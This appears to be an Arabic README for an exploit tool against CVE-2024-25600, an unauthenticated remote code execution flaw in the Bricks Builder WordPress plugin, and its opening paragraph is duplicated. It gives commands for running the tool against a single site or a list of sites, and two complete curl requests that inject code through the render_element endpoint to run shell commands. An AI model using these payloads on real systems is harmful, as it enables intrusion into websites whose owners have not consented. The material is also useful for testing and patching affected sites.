
هذه الأداة مصممة لاستغلال ثغرة CVE-2024-25600 الموجودة في إضافة Bricks Builder لـ WordPress. تسمح الثغرة بتنفيذ أكواد برمجية عن بُعد دون مصادقة على المواقع المتأثرة. تعمل الأداة على أتمتة عملية الاستغلال عبر استرجاع الـ nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر عشوائية.
هذه الأداة 🛠️ مصممة لاستغلال ثغرة CVE-2024-25600 🕳️ الموجودة في إضافة Bricks Builder لـ WordPress. تسمح الثغرة بتنفيذ التعليمات البرمجية عن بُعد دون مصادقة على المواقع المتأثرة 💻. تعمل الأداة على أتمتة عملية الاستغلال عن طريق استرداد nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر تعسفية.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> لبدء الوضع التفاعلي.python exploit.py -l <file_path> لفحص واستغلال المواقع المدرجة.إن إثبات المفهوم الأساسي المقدم من الكشف هو كما يلي:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
تحديث: إثبات مفهوم ثانٍ (أكثر موثوقية)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
من الممكن أن تحقق حمولات إضافية نتائج أفضل. إذا لم يعمل استغلالي أو إثبات المفهوم معك، أشجعك على تجربة حمولات بديلة لإيجاد حل أكثر فعالية.
استبدل [HOST] بالموقع المستهدف و[NONCE] بقيمة nonce المسترجعة من الموقع.
لمزيد من المعلومات حول ثغرة CVE-2024-25600، يرجى الرجوع إلى الكشف المفصل على Snicco.io.
المعلومات الواردة في هذا README هي لأغراض تعليمية فقط. القرصنة غير المصرح بها للمواقع أو الشبكات غير قانونية وغير أخلاقية. 🚫
نشكر الباحثين في مجال الأمن الذين اكتشفوا وأبلغوا عن هذه الثغرة، مما وفر للمجتمع المعلومات والأدوات للمساعدة في تأمين تطبيقات الويب الخاصة بهم.